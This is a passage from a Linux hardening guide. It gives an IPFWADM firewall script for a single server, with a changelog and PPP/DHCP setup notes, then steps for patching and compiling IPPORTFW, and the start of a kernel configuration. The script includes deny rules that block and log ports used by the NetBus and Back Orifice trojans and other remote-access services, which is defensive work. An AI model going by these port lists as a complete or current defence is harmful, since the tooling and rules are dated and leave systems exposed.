-- #Run the IP MASQ and firewall script /etc/rc.d/rc.firewall -- Slackware: Next, append this to the end of the "/etc/rc.d/rc.local" file -- #Run the IP MASQ and firewall script /etc/rc.d/rc.firewall -- - Make the rc.firewall file executable chmod 700 /etc/rc.d/rc.firewall ########################################################################### # NON-MASQ rc.firewall # # # # The follwing IPFWADM ruleset, based upon the ruleset above, is for # # NON-MASQ users who just want to restrict access to their Linux box. # # This current config allows gloabal acces to: # # # # - DNS, SENDMAIL, WWW # # # # But it restricts access to only a few IPS for: # # # # - SSH, FTP, FTP-DATA, and POP-3 # ########################################################################### +-----------------------------------------------+ | rc.firewall for NON-MASQ setups using IPFWADM | | | | *** Discontinued!!! Patch your 2.0.x kernel | | and use the IPCHAINS rules!! | +-----------------------------------------------+ /etc/rc.d/rc.firewall -- #!/bin/sh #-------------------------------------------------------------------- # Version v2A.97 # # NOTE to ALL IPFWADM users: # # As you all know, IPFWADM has been replaced by IPCHAINS for some time # now. I've also been updating the IPCHAINS rulesets for a while yet # the IPFWADM rulesets haven't been updated. # # Though this sucks that I have to do this, I can't maintain both. # In the future, I will REMOVE these rulesets though I will make them # available via a different URL. # # ** BUT... there is a kernel patch to get IPCHAINS running on 2.0.x # kernels. Please see [Section 5] for the URL and use IPCHAINS from # now on. Ok? # # v2A.97 - Fixed a typo in the BackOrofice filter. It was using the var # exitif vs. the correct extif. # # v2A.96 - Added blurbs and scripts in the EXTIP, EXTBROAD, and DGW variable # areas that DHCP users should use "dhcpcd" with the -c option to re-run # the ruleset upon lease renews. It is also mentioned that both # DHCP and PPP users need to get their EXTBROAD and DGW addresses # dynamically. # # - Changed the debug system to re-create the debug log each time # (removed one of the >'s at the top of the debug setup) # # v2A.95 - Added a /0 to the final OUTPUT reject rule. It was implictly there but its good # for documentation reasons. There were also a few IMPUT rules that DENYed # instead of REJECTed traffic for spoofed traffic, etc. Fixed. # I also noted that the automatic $extbroad varible will only be properly set if # you have a typical 255.255.255.0 netmask. If you don't, you'll have to statically # define it vs. use the automatic method. # v2A.94 - Added explict INPUT filters for NFS and OUTPUT filters for Mountd and RPC # v2A.93 - Added explict OUTPUT filters for the BackOrofice and NetBus Windows trojans # v2A.92 - Moved the default policy settings and INPUT/OUTPUT/FORWARD flush from # the top of each section to the top top of the entire ruleset. # v2A.91 - Added more firewall DENY rules to stop Xwindows ports 6001-6007 # v2A.90 - Changed the default policies from DENY to REJECT. # v2A.80 - Clarified the input/output rules for HTTP to use the -W interface # option. # v2A.75 - Added and commented on the addition of multicast traffic # - Caught a serious typo: -V CANNOT have a subnet mask appended to it. Though # this is inconsitant with the other commands, this has been confirmed. # v2A.71 - Redirectted the rc.firewall debugging info to /tmp/rc.firewall.dump # v2A.70 - Added commented out debugging echo statements right after the enviroment vars # - Deleted the un-used $intif, $intip, and $intnet enviroment vars # # v2A.65 - Removed the /32 bit subnet mask from the intip, dgw, secondarydns, # and securehost variables and manually placed them back within the rulesets # themselves. This is for users who use DHCP and/or PPP that wouldn't get the # correct netmask. Also, the netmask built into these variables would break # the IPPORTFW section. # - Added the LOOPBACK variable for better readibilty # - Cleaned the comment sections a little # # v2A.60 - Added #'ed out rules to support the Linux box getting addressed via DHCP # v2A.51 - Corrected the vars passed to PPPd as shown bellow in the comments section # v2A.50 - Deleted an already #ed out line to allow in ALL incoming # traffic. # - Added a /32 bit subnet mask to the intip, extip, dgw, secondarydns, # and securehost variables. Because of this, I then deleted a few stray # and possibly incorrect /24 and /32 bit masks on various IPFWADM rules # v2A.45 - Added the enviroment variables that PPPd passes to ease the # use of IPFWADM firewalls # v2A.40 - Made some clarifications for dynamically addressed users and # the "extif" variable. # v2A.30 - Added the better commented enviroment vars # - Added #'ed out IPFWADM statements to do non-logged filtering # of BOOTP (ports 67-68), Samba (ports 137-138), RIP # (port 520), and SNMP (port 161) # - Deleted out all the leftover header docments that were # specific to the MASQ firewall # - Added TCP support for DHCP # - Fixed outgoing DNS to reflect port 53 on the SOURCE packet # # v2A.20 - New rev for firewalling of a single interface server # #-------------------------------------------------------------------- # ++ Best viewed in a window at 90+ columns # # This script was adapted from Ambrose's IPMASQ-HOWTO and several # other resources including: # # - Me # # **Note**: This config ASSUMES: # 1) Your external LAN is on eth0 # 2) Your static IP address is 100.200.0.212 # # Obviously, this config won't be totally correct for your # enviroment nor can your static IP address be the same # as mine! # # So, you'll need to either manually change the IP address in # the enviroment variable section or or use the following # command to set it up for you. # # This config also handles both IP spoofing and stuffed routing # and IP Masquerading. Anything not explictly allowed is # REJECTED. Rejecting traffic is better than DENYING it since # it makes the IPFWADM'ED machine look like its not CAPABLE of # doing that particular protocol! # # ***PPP USERS*** # # 1) All PPP users that get Dynamic IP address should # # out the "extip" variable a page or so down and then un-# out the # following command for your dynamic IP address: # # extip=`/sbin/ifconfig | grep -A 4 ppp0 | awk '/inet/ { print $2 } ' | sed -e s/addr://` # # 2. Create the /etc/ppp/ip-up script file to execute this ruleset: # # /etc/ppp/ip-up # -- # #!/bin/sh # /etc/rc.d/rc.firewall # -- # # Now make this new script executable by running "chmod 700 /etc/ppp/ip-up" # # NOTE: When PPPd runs the /etc/ppp/ip-up script, it passes several # enviroment variables which can help bring up the script. # Though I haven't updated my doc to use these variables, I will # at a future date: # # $1 = Interface being brought up (e.g. ppp0) # $2 = TTY device being used (/dev/modem) # $3 = # Terminal speed (38400) # $4 = IP address of my local PPP interface # $5 = IP address of the remote P-t-P link (default gw) # $6 = This is the IPPARM string that is passed from the options # file for any ip-up specific use # # 3. Now make this new script executable by running "chmod 700 /etc/ppp/ip-up" #--------------------------------------------------------------------------- #Enviroment Variables - Change to suit your enviroment # #Specification of the LOOPBACK interface loopback="127.0.0.1" #Specification of the EXTERNAL NIC # # PPP Users: If you are using the Dynamic PPP "extif" script from above, # make sure to comment the below line out so it doesn't override it. # # If you want to use the PPPd variables, change this to read: # extif="$1" # extif="eth0" #The IP address you get from the Internet # # PPP users: If you are getting dynamic address, either use the "extip" script # from the header above or if you want to use the PPPd variables, # change this to read: # extip="$3" # # or you can use the following script: # # EXTIP=`/sbin/ifconfig | grep -A 4 $EXTIF | awk '/inet/ { print $2 } ' | sed -e s/addr://` # # # DHCP users: DHCP users should also update the script that runs DHCP to # use "dhcpcd" instead of other solutions like RH6's # "pump" DHCP solution and also have dhcpcd load with # the option: # # -c /etc/rc.d/rc.firewall.ipchains # # This will let the firewall re-run upon DHCP lease renews # just in case you get a different IP address. # extip="100.200.0.212" #The IP broadcast address of the external net # # PPP users: If you are getting dynamic address, use the the PPPd variables. # Change "extbroad" to read (this make an assuption but it should # be a safe assumption): # extbroad=`echo $4 | cut -d '.' -f 1-3`.255 # # NOTE: This method will only work for typical 255.255.255.0 netmasks, # if you get other masks such as a 255.255.252.0, you will have to # statically define it like it is now instead of using the dynamic # setup. # extbroad="100.200.0.255" #IP address of the default gateway on the EXTERNAL NIC # # PPP users: If you are getting dynamic address, use the the PPPd variables. # Change "dgw" to read: # dgw=$4 # # or # # dgw=`/sbin/ifconfig | grep -A 4 ppp0 | awk '/gateway/ { print $2 } ' | sed -e s/addr://` # dgw="100.200.0.1" #IP Mask for ALL IP addresses universe="0.0.0.0" #IP Mask for BROADCAST broadcast="255.255.255.255" #Specification of HIGH IP ports # NOTE: Notice that this STARTS at 1024 and NOT at 1023 which it should. # for some reason SSH sometimes initiates connections at 1023 which # is a TCP violation but shit happens. # unprivports="1024:65535" #Specification of backup DNS server secondarydns="102.200.0.25" #Specifically allowed external host - secure1.host.com securehost="200.211.0.40" #--------------------------------------------------------------------------- # Debugging Section: If you are having problems with the firewall, uncomment # out (un # out) the follow echo lines and then re-run # the firewall to make sure that the rc.firewall is # getting the right info. # #echo Loopback IP: $loopback > /tmp/rc.firewall.dump #echo ----------------------------------------------------- >> /tmp/rc.firewall.dump #echo External interface name: $extif >> /tmp/rc.firewall.dump #echo External interface IP: $extip >> /tmp/rc.firewall.dump #echo External interface broadcast IP: $extbroad >> /tmp/rc.firewall.dump #echo External interface default gateway: $dgw >> /tmp/rc.firewall.dump #echo ----------------------------------------------------- >> /tmp/rc.firewall.dump #echo External secondary DNS (optional): $secondarydns >> /tmp/rc.firewall.dump #echo External secured host (optional): $securehost >> /tmp/rc.firewall.dump #--------------------------------------------------------------------------- # For a nice display echo " " #Multicast is a powerful, yet seldom used aspect of TCP/IP for multimedia # data. Though it isn't used much now (because most ISPs don't enable # multicast on their networks, it will be very common in a few more # years. Check out www.mbone.com for more detail. # # NOTE: Adding this feature is OPTIONAL # echo "Adding multicast route.." /sbin/route add -net 224.0.0.0 netmask 240.0.0.0 dev $extif #--------------------------------------------------------------------------- #Set all default policies to REJECT and flush all old rules: echo "Set all default policies to REJECT and flush all old rules" #Change default policies /sbin/ipfwadm -I -p reject /sbin/ipfwadm -O -p reject /sbin/ipfwadm -F -p reject #Flush all old rulesets /sbin/ipfwadm -I -f /sbin/ipfwadm -O -f /sbin/ipfwadm -F -f #--------------------------------------------------------------------------- echo "Enabling general INPUT on the external LAN.. line 74" #--------------------------------------------------------------------------- # INCOMING traffic on the EXTERNAL LAN network # -------------------------------------------- # # local interface, local machines, going anywhere is valid #/sbin/ipfwadm -I -a accept -V $extip -S $intnet/24 -D $universe/0 # remote interface, claiming to be local machines, IP spoofing, get lost & log #/sbin/ipfwadm -I -a reject -V $extip -S $intnet/24 -D $universe/0 -o # loopback interface is valid. /sbin/ipfwadm -I -a accept -V $loopback -S $universe/0 -D $universe/0 # DHCP - SERVER - to serve out DHCP addresses on the internal LAN 67=bootps 68=bootpc #/sbin/ipfwadm -I -a accept -W $intif -P udp -S $universe/0 bootpc -D $broadcast/0 bootps ## DHCP - CLIENT - if you get a dynamic IP address for your ADSL or Cablemodem connection #/sbin/ipfwadm -I -a accept -W $extif -P udp -S $universe/0 bootps -D $broadcast/0 bootpc #/sbin/ipfwadm -I -a accept -W $extif -P tcp -S $universe/0 bootps -D $broadcast/0 bootpc # Questionable... ??? # /sbin/ipfwadm -I -a accept -V $extip -P -k -S $universe/0 -D $intnet/24 $unprivports #----------- # ICMP: Allow ICMP from the local default GW /sbin/ipfwadm -I -a accept -W $extif -P icmp -S $dgw/32 -D $extip/32 ## ICMP: Allow ICMP from the universe but LOG it .. nice thought but unless you ## can figure out how to ignore REPLIES.. this is too much logging! #/sbin/ipfwadm -I -a accept -W $extif -P icmp -S $universe/0 -D $extip/32 -o /sbin/ipfwadm -I -a accept -W $extif -P icmp -S $universe/0 -D $extip/32 # NTP: Allow NTP updates tcp from any host /sbin/ipfwadm -I -a accept -W $extif -P tcp -S $universe/0 -D $extip/32 ntp # IDENT: Allow IDENT on ALL interfaces but disable it in /etc/inetd.conf /sbin/ipfwadm -I -a accept -P tcp -S $universe/0 -D $universe/0 113 # DNS Lookups & Zone transfers: Since this site is an authoritative DNS server, we must # open up DNS to the public on ALL interfaces /sbin/ipfwadm -I -a accept -P tcp -S $universe/0 -D $universe/0 53 /sbin/ipfwadm -I -a accept -P udp -S $universe/0 -D $universe/0 53 # SMTP MAIL: Since this site is an authoritative SMTP server, allow it in on ALL # interfaces # # NOTE: No specific -W interfaces are given since I want SMTP to be available # from ALL interfaces and not just one specific one. # /sbin/ipfwadm -I -a accept -P tcp -S $universe/0 -D $extip/32 smtp # WWW: Since this site is an authoritative WWW server, allow it in on ALL # interfaces /sbin/ipfwadm -I -a accept -P tcp -W $extif -S $universe/0 -D $extip/32 www # NFS /sbin/ipfwadm -I -a reject -W $extif -P tcp -S $universe/0 -D $extip/32 2049 /sbin/ipfwadm -I -a reject -W $extif -P tcp -S $universe/0 2049 -D $extip/32 # HIGH PORTS: Enable all HIGH ports for reply tcp/udp traffic /sbin/ipfwadm -I -a accept -P tcp -S $universe/0 -D $extip/32 $unprivports /sbin/ipfwadm -I -a accept -P udp -S $universe/0 -D $extip/32 $unprivports echo "Enabling explict INPUT on the external LAN.. line 136" ############################################################################## # Begin Explict IP INPUT allows on the EXTERNAL LAN network: ############################################################################## # #securehost /sbin/ipfwadm -I -a accept -W $extif -P tcp -S $securehost/32 -D $extip/32 ftp ftp-data ssh # ############################################################################## # End Explict IP INPUT allows on the EXTERNAL LAN network: ############################################################################## # ******************************************************************************** # ** Uncomment these non-logging IPFWADM rules if they apply to your enivroment ** # ******************************************************************************** # Reject all stray BOOTP traffic but DON'T log it since it fills up the logs fast #/sbin/ipfwadm -I -a reject -P udp -S $universe/0 68 # Reject all stray Samba traffic but DON'T log it since it fills up the logs fast #/sbin/ipfwadm -I -a reject -P udp -S $universe/0 -D $universe/0 137 138 139 # Reject all stray RIP traffic but DON'T log it since it fills up the logs fast #/sbin/ipfwadm -I -a reject -P udp -S $universe/0 -D $universe/0 520 # Reject all stray SNMP traffic but DON'T log it since it fills up the logs fast #/sbin/ipfwadm -I -a reject -P udp -S $universe/0 -D $broadcast/0 161 # catch all rule, all other incoming is denied and logged. pity there is no # log option on the policy but this does the job instead. /sbin/ipfwadm -I -a reject -S $universe/0 -D $universe/0 -o echo "Enabling general OUTPUT on the external LAN.. line 174 " #--------------------------------------------------------------------------- # OUTGOING traffic on the EXTERNAL LAN network # -------------------------------------------- # local interface, any source going to local net is valid #/sbin/ipfwadm -O -a accept -V $intip -S $universe/0 -D $intnet/24 # outgoing to local net on remote interface, stuffed routing, deny & log #/sbin/ipfwadm -O -a reject -V $extip -S $universe/0 -D $intnet/24 -o # outgoing from local net on remote interface, stuffed masquerading, deny #/sbin/ipfwadm -O -a reject -V $extip -S $intnet/24 -D $universe/0 -o # outgoing from local net on remote interface, stuffed masquerading, deny #/sbin/ipfwadm -O -a reject -V $extip -S $universe/0 -D $intnet/24 -o # loopback interface is valid. /sbin/ipfwadm -O -a accept -V $loopback -S $universe/0 -D $universe/0 # DHCP - SERVER - to serve out DHCP addresses on the internal LAN 67=bootps 68=bootpc #/sbin/ipfwadm -O -a accept -W $intif -P udp -S $intip/32 bootps -D $broadcast/0 bootpc ## DHCP - CLIENT - if you get a dynamic IP address for your ADSL or Cablemodem connection #/sbin/ipfwadm -O -a accept -W $extif -P udp -S $universe/0 bootpc -D $broadcast/0 bootps #/sbin/ipfwadm -O -a accept -W $extif -P tcp -S $universe/0 bootpc -D $broadcast/0 bootps echo "Enabling general OUTPUT on the EXTERNAL LAN.. line 204 " # -------------------------------------------- # ICMP: Allow ICMP traffic out /sbin/ipfwadm -O -a accept -P icmp -S $universe/0 -D $universe/0 # NTP: Allow NTP updatestcp from any host /sbin/ipfwadm -O -a accept -W $extif -P tcp -S $extip/32 ntp -D $universe/0 # IDENT: Allow IDENT out but have it disabled in /etc/inetd.conf /sbin/ipfwadm -O -a accept -P tcp -S $universe/0 113 -D $universe/0 # DNS Lookups & Zone transfers: Since this site is an authoritative DNS # server, we must open up DNS to the public # on ALL interfaces # - You do not need port 42? /sbin/ipfwadm -O -a accept -P tcp -S $extip/32 53 -D $universe/0 /sbin/ipfwadm -O -a accept -P udp -S $extip/32 53 -D $universe/0 # SMTP MAIL: Since this site is an authoritative SMTP server, allow it in on ALL # interfaces # # NOTE: No specific -W interfaces are given since I want SMTP to be available # from ALL interfaces and not just one specific one. # /sbin/ipfwadm -O -a accept -P tcp -S $extip/32 smtp -D $universe/0 # WWW: Since this site is an authoritative www server, allow it in on ALL # interfaces /sbin/ipfwadm -O -a accept -P tcp -W $extif -S $extip/32 www -D $universe/0 # RPC - reject /sbin/ipfwadm -O -a reject -W $extif -P udp -S $extip/32 -D $universe/0 111 -o /sbin/ipfwadm -O -a reject -W $extif -P udp -S $extip/32 111 -D $universe/0 -o # Mountd - reject /sbin/ipfwadm -O -a reject -W $extif -P udp -S $extip/32 -D $universe/0 635 -o /sbin/ipfwadm -O -a reject -W $extif -P udp -S $extip/32 635 -D $universe/0 -o # PPTP - reject /sbin/ipfwadm -O -a reject -W $extif -P tcp -S $extip/32 -D $universe/0 1723 -o /sbin/ipfwadm -O -a reject -W $extif -P udp -S $extip/32 -D $universe/0 1723 -o # Remote Winsock - Reject /sbin/ipfwadm -O -a reject -W $extif -P tcp -S $extip/32 -D $universe/0 1745 -o /sbin/ipfwadm -O -a reject -W $extif -P udp -S $extip/32 -D $universe/0 1745 -o # NFS - Reject /sbin/ipfwadm -O -a reject -W $extif -P tcp -S $extip/32 -D $universe/0 2049 -o /sbin/ipfwadm -O -a reject -W $extif -P tcp -S $extip/32 2049 -D $universe/0 -o /sbin/ipfwadm -O -a reject -W $extif -P udp -S $extip/32 -D $universe/0 2049 -o /sbin/ipfwadm -O -a reject -W $extif -P udp -S $extip/32 2049 -D $universe/0 -o # PcAnywhere - Reject /sbin/ipfwadm -O -a reject -W $extif -P tcp -S $extip/32 -D $universe/0 5631 -o /sbin/ipfwadm -O -a reject -W $extif -P udp -S $extip/32 -D $universe/0 5631 -o /sbin/ipfwadm -O -a reject -W $extif -P tcp -S $extip/32 -D $universe/0 5632 -o /sbin/ipfwadm -O -a reject -W $extif -P udp -S $extip/32 -D $universe/0 5632 -o # Xwindows - Deny /sbin/ipfwadm -O -a reject -W $extif -P tcp -S $extip/32 -D $universe/0 6000 -o /sbin/ipfwadm -O -a reject -W $extif -P tcp -S $extip/32 -D $universe/0 6001 -o /sbin/ipfwadm -O -a reject -W $extif -P tcp -S $extip/32 -D $universe/0 6002 -o /sbin/ipfwadm -O -a reject -W $extif -P tcp -S $extip/32 -D $universe/0 6003 -o /sbin/ipfwadm -O -a reject -W $extif -P tcp -S $extip/32 -D $universe/0 6004 -o /sbin/ipfwadm -O -a reject -W $extif -P tcp -S $extip/32 -D $universe/0 6005 -o /sbin/ipfwadm -O -a reject -W $extif -P tcp -S $extip/32 -D $universe/0 6006 -o /sbin/ipfwadm -O -a reject -W $extif -P tcp -S $extip/32 -D $universe/0 6007 -o # /sbin/ipfwadm -O -a reject -W $extif -P udp -S $extip/32 -D $universe/0 6000 -o /sbin/ipfwadm -O -a reject -W $extif -P udp -S $extip/32 -D $universe/0 6001 -o /sbin/ipfwadm -O -a reject -W $extif -P udp -S $extip/32 -D $universe/0 6002 -o /sbin/ipfwadm -O -a reject -W $extif -P udp -S $extip/32 -D $universe/0 6003 -o /sbin/ipfwadm -O -a reject -W $extif -P udp -S $extip/32 -D $universe/0 6004 -o /sbin/ipfwadm -O -a reject -W $extif -P udp -S $extip/32 -D $universe/0 6005 -o /sbin/ipfwadm -O -a reject -W $extif -P udp -S $extip/32 -D $universe/0 6006 -o /sbin/ipfwadm -O -a reject -W $extif -P udp -S $extip/32 -D $universe/0 6007 -o # NetBus: REJECT Netbus and LOG it /sbin/ipfwadm -O -a reject -W $extif -P tcp -S $extip/32 -D $universe/0 12345 -o /sbin/ipfwadm -O -a reject -W $extif -P tcp -S $extip/32 -D $universe/0 12346 -o # BackOrofice: REJECT BO on LOG it /sbin/ipfwadm -O -a reject -W $extif -P udp -S $extip/32 -D $universe/0 31337 -o # HIGH PORTS: Enable all HIGH ports for reply tcp/udp traffic /sbin/ipfwadm -O -a accept -P tcp -S $extip/32 $unprivports -D $universe/0 /sbin/ipfwadm -O -a accept -P udp -S $extip/32 $unprivports -D $universe/0 echo "Enabling explict OUTPUT on the external LAN.. line 231" ############################################################################## # Begin Explict IP OUTPUT allows on the EXTERNAL LAN network: ############################################################################## # #securehost /sbin/ipfwadm -O -a accept -W $extif -P tcp -S $extip/32 ftp ftp-data ssh -D $securehost/32 $unprivports # ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ ############################################################################## # End Explict IP OUTPUT allows: ############################################################################## # catch all rule, all other outgoing is denied and logged. pity there is no # log option on the policy but this does the job instead. # # This should catch everything including SAMBA an all non-explictly allowed # TELNET, FTP, FTP-DATA, SSH, etc. /sbin/ipfwadm -O -a reject -S $universe/0 -D $universe/0 -o #--------------------------------------------------------------------------- # Forwarding traffic from the internal LAN network # -------------------------------------------- # catch all rule, all other forwarding is denied and logged. pity there is no # log option on the policy but this does the job instead. /sbin/ipfwadm -F -a reject -S $universe/0 -D $universe/0 -o #-------------------------------------------------------------------- # For a nice display echo " " # --end -- Next, append this to the end of the "/etc/rc.d/rc.local" file All distributions: -- #Run the IP MASQ and firewall script /etc/rc.d/rc.firewall -- - Make the rc.firewall file executable chmod 700 /etc/rc.d/rc.firewall #-------------------------------------------------------------------- # How to test your new firewall.. # # From the IPFWADM console: # # TELNET: telnet to a remote site # SSH: ssh to a remote site # DNS: run nslookup with "server = " and "set q =" # NTP: run "/etc/cron.15min/gettime" # Xwin: "export DISPLAY=your-remote-FQDN:0.0" # Run a X-server on the remote machine # Run "xeyes" # # From a MASQed computer on the internal LAN: # # From another machine on the Internet: # TELNET: telnet to your IPFWADMed machine # SSH: SSH to your IPFWADMed machine # # *** Finally.. download "nmap" (URL is in [Section 5] and run it # in both SOCKET and UDP mode to port scan your new firewall! # ================================================================================ Section 11 - Patching, Compiling, and installing IPPORTFW IPPORTFW for 2.0.x kernels allow for direct connections from the Internet to connect to one of your internal privately addressed servers. Linux 2.2.x kernels have this functionality built in. If you are running a 2.2.x kernel, you will need to use the new tool called IPMASQADM. Please see the IP-MASQ-HOWTO found in [Section 5] for FULL details. Ie. If you have a WWW server, a POP3 server, etc... (say 192.168.0.2) running behind your MASQing Linux box, you can have the MASQ box forward ALL port 80, port 110, etc connections sent to 192.168.0.2 automatically! With the stock kernel, you CANNOT port forward FTP traffic or many non-NAT friendly Internet games properly to an internal MASQed host. To do this, you need to apply kernels patches, compile up a new IP_MASQ_FTP kernel module, etc. Though these specific topics are not covered in TrinityOS, they ARE fully covered in the new IP-MASQ-HOWTO that I have written. This new HOWTO is available on the IP MASQ WWW site and the URL for this site in in [Section 5] NOTE#2: Many people use IPAUTOFW for this function and it does work. But, I have to warn you, I have seen and PROVEN that IPAUTOFW can cause both performance and reliability issues even when compiled IN! Just don't use IPAUTOFW. Use IPPORTFW. - First, you might be concerned about security, but this is what what Steven had to say about that (the author of IPPORTFW): "Port Forwarding is only called within masquerading functions so it fits inside the same ipfwadm rules. Masquerading is an extension to IP forwarding. Therefore, ipportfw only sees a packet if it fits both the input and masquerading ipfwadm rule sets." From this and my IPFWADM ruleset in [Section 10], you will see that the packet has to pass through your IPFWADM rulesets before being forwarded. Excellent! - Anyway, download BOTH from the URL in [Section 5] - ipportfw.c source file - the kernel patch files for 2.0.36 Put this code into the /usr/src directory. I also recommend that you goto Steven's WWW page and copy the "usage" page into a text file on the Linux for future use (there isn't a Man page for IPPORTFW). - Ok, FTP the latest stable kernel (URL in [Section 5]) to /usr/src/ - Uncompress it ( tar -xzvf linux-2.0.36.tar.gz ) - For usability, rename the newly created "linux" direcory to the proper kernel version and then just create a symbolic link to re-create the "linux" directory. ie mv linux linux-2.0.36 ln -s linux-2.0.36 linux - Copy the IPPORTFW patch into the Linux directory cp /usr/src/subs-patch-1.37.gz /usr/src/linux - Now, you need to patch the kernel for IPPORTFW to become a compilable option: cd /usr/src/linux zcat subs-patch-1.3x.gz | patch -p1 - Thats it for the kernel for now. Now, compile the IPPORTFW program cd /usr/src gcc ipportfw.c -o ipportfw - Finally, install it mv ipportfw /usr/local/sbin - If you have additional questions, please see the IP-MASQ-HOWTO found in [Section 5] for FULL details. ================================================================================ Section 12 - Initial Linux Kernel compiling TrinityOS currently reflects the building of both a 2.2.10 and also 2.0.36 kernels. If you didn't already know, Linux kernel numbering follows a rule: - All EVEN numbered kernels (1.0, 1.2, 2.0, 2.2, etc) are all BETA or stable (productional) kernels. Beta kernels are usually locked out of having new features added to them so that the developers and concentrate on simply fixing bugs and making the code more stable. Latest numbered kernels are always the best to run. - All ODD numbered kernels (.9, 1.1, 1.3, 2.1, 2.3, etc) are all ALPHA or test kernels. Alpha kernels are where new Linux features are added, tested, and debugged. After a specific "lockout" period announced by Linus, no more new features can be put into a given Alpha kernel generation. After this, the alpha kernel is simply fixed up for a while more and once the kernel is considered stable, it is moved to the next BETA kernel version and a new ALPHA kernel is started. Be warned: Alpha kernel revs can be released on occasion that are unstable, cause data corruption, or even not compile at all. Like anything in the Linux world, these issues are fixed at a rapid rate and become more stable every day. As it stands, the latest 2.1.x+ kernels are VERY stable and will be rolled into the 2.2.x kernel soon. After this, the 2.3.x Alpha kernel will be started up. * Anyway, lets get down to compiling up a kernel. All initial steps to getting * the kernel sources and uncompression the kernel is in the previous section [required * since the IPPORTFW patches change the kernel a little] - Configure it ("make config") - below config is for my hardware, make changes to your config as necessary - 2.2.x kernels: The new 2.2.x kernels are the next generation in Linus's kernels. They offer enhanced performance, better SMP functionality, etc. At the same time, they had to change some things compared to the 2.0.x kernels and thus broke things. If you are running an older Linux distribution that did NOT come with a 2.2.x kernel, you will have to upgrade the following tools. Personally, I highly recommend that you install a new Linux distribution that natively supports the 2.2.x kernels. This will save you a lot of time and suffering in the long run. Redhat: ftp://ftp.rge.com/pub/systems/linux/redhat/updates/5.2/kernel-2.2/i386/ dhcpcd-1.3.16-0.i386.rpm, initscripts-3.78-2.2.i386.rpm, ipchains-1.3.8-0.i386.rpm modutils-2.1.121-0.i386.rpm, net-tools-1.50-0.i386.rpm, procinfo-15-0.i386.rpm samba-2.0.0-0.i386.rpm, util-linux-2.9-0.i386.rpm 2.2.x kernel setup: NOTE: This kernel config reflects different hardware than documented in TrinityOS. This kernel is running on a Hp Xu 5/90 Dual Pentium 90 with 40MB of RAM, PCI ethernet cards, etc. ** This config is for a 2.2.10 kernel ** /usr/src/linux/.config -------- # # Automatically generated by make menuconfig: don't edit # # # Code maturity level options # CONFIG_EXPERIMENTAL=y # # Processor type and features # # CONFIG_M386 is not set # CONFIG_M486 is not set # CONFIG_M586 is not set CONFIG_M586TSC=y # CONFIG_M686 is not set CONFIG_X86_WP_WORKS_OK=y CONFIG_X86_INVLPG=y CONFIG_X86_BSWAP=y CONFIG_X86_POPAD_OK=y CONFIG_X86_TSC=y CONFIG_1GB=y # CONFIG_2GB is not set # CONFIG_MATH_EMULATION is not set # CONFIG_MTRR is not set # CONFIG_SMP is not set # # Loadable module support # CONFIG_MODULES=y # CONFIG_MODVERSIONS is not set CONFIG_KMOD=y # # General setup # CONFIG_NET=y CONFIG_PCI=y # CONFIG_PCI_GOBIOS is not set # CONFIG_PCI_GODIRECT is not set CONFIG_PCI_GOANY=y CONFIG_PCI_BIOS=y CONFIG_PCI_DIRECT=y CONFIG_PCI_QUIRKS=y # CONFIG_PCI_OPTIMIZE is not set CONFIG_PCI_OLD_PROC=y # CONFIG_MCA is not set # CONFIG_VISWS is not set CONFIG_SYSVIPC=y # CONFIG_BSD_PROCESS_ACCT is not set CONFIG_SYSCTL=y CONFIG_BINFMT_AOUT=y CONFIG_BINFMT_ELF=y CONFIG_BINFMT_MISC=y # CONFIG_BINFMT_JAVA is not set CONFIG_PARPORT=y CONFIG_PARPORT_PC=y # CONFIG_PARPORT_OTHER is not set CONFIG_APM=y # CONFIG_APM_IGNORE_USER_SUSPEND is not set # CONFIG_APM_DO_ENABLE is not set # CONFIG_APM_CPU_IDLE is not set # CONFIG_APM_DISPLAY_BLANK is not set CONFIG_APM_POWER_OFF=y # CONFIG_APM_IGNORE_MULTIPLE_SUSPEND is not set # CONFIG_APM_IGNORE_SUSPEND_BOUNCE is not set # CONFIG_APM_RTC_IS_GMT is not set # CONFIG_APM_ALLOW_INTS is not set # # Plug and Play support # CONFIG_PNP=y # CONFIG_PNP_PARPORT is not set # # Block devices # CONFIG_BLK_DEV_FD=y CONFIG_BLK_DEV_IDE=y # CONFIG_BLK_DEV_HD_IDE is not set CONFIG_BLK_DEV_IDEDISK=y CONFIG_BLK_DEV_IDECD=y # CONFIG_BLK_DEV_IDETAPE is not set # CONFIG_BLK_DEV_IDEFLOPPY is not set # CONFIG_BLK_DEV_IDESCSI is not set # CONFIG_BLK_DEV_CMD640 is not set # CONFIG_BLK_DEV_RZ1000 is not set CONFIG_BLK_DEV_IDEPCI=y CONFIG_BLK_DEV_IDEDMA=y # CONFIG_BLK_DEV_OFFBOARD is not set CONFIG_IDEDMA_AUTO=y # CONFIG_BLK_DEV_OPTI621 is not set # CONFIG_BLK_DEV_TRM290 is not set # CONFIG_BLK_DEV_NS87415 is not set # CONFIG_BLK_DEV_VIA82C586 is not set # CONFIG_BLK_DEV_CMD646 is not set # CONFIG_IDE_CHIPSETS is not set CONFIG_BLK_DEV_LOOP=m # CONFIG_BLK_DEV_NBD is not set CONFIG_BLK_DEV_MD=y CONFIG_MD_LINEAR=y CONFIG_MD_STRIPED=y CONFIG_MD_MIRRORING=y CONFIG_MD_RAID5=y # CONFIG_MD_BOOT is not set CONFIG_BLK_DEV_RAM=y CONFIG_BLK_DEV_INITRD=y # CONFIG_BLK_DEV_XD is not set # CONFIG_BLK_DEV_DAC960 is not set CONFIG_PARIDE_PARPORT=y # CONFIG_PARIDE is not set # CONFIG_BLK_CPQ_DA is not set # CONFIG_BLK_DEV_HD is not set # # Networking options # CONFIG_PACKET=y CONFIG_NETLINK=y CONFIG_RTNETLINK=y # CONFIG_NETLINK_DEV is not set CONFIG_FIREWALL=y # CONFIG_FILTER is not set CONFIG_UNIX=y CONFIG_INET=y CONFIG_IP_MULTICAST=y # CONFIG_IP_ADVANCED_ROUTER is not set # CONFIG_IP_PNP is not set CONFIG_IP_FIREWALL=y # CONFIG_IP_FIREWALL_NETLINK is not set # CONFIG_IP_TRANSPARENT_PROXY is not set CONFIG_IP_MASQUERADE=y CONFIG_IP_MASQUERADE_ICMP=y CONFIG_IP_MASQUERADE_MOD=y # CONFIG_IP_MASQUERADE_IPAUTOFW is not set CONFIG_IP_MASQUERADE_IPPORTFW=y # CONFIG_IP_MASQUERADE_MFW is not set CONFIG_IP_ROUTER=y # CONFIG_NET_IPIP is not set # CONFIG_NET_IPGRE is not set # CONFIG_IP_MROUTE is not set CONFIG_IP_ALIAS=y # 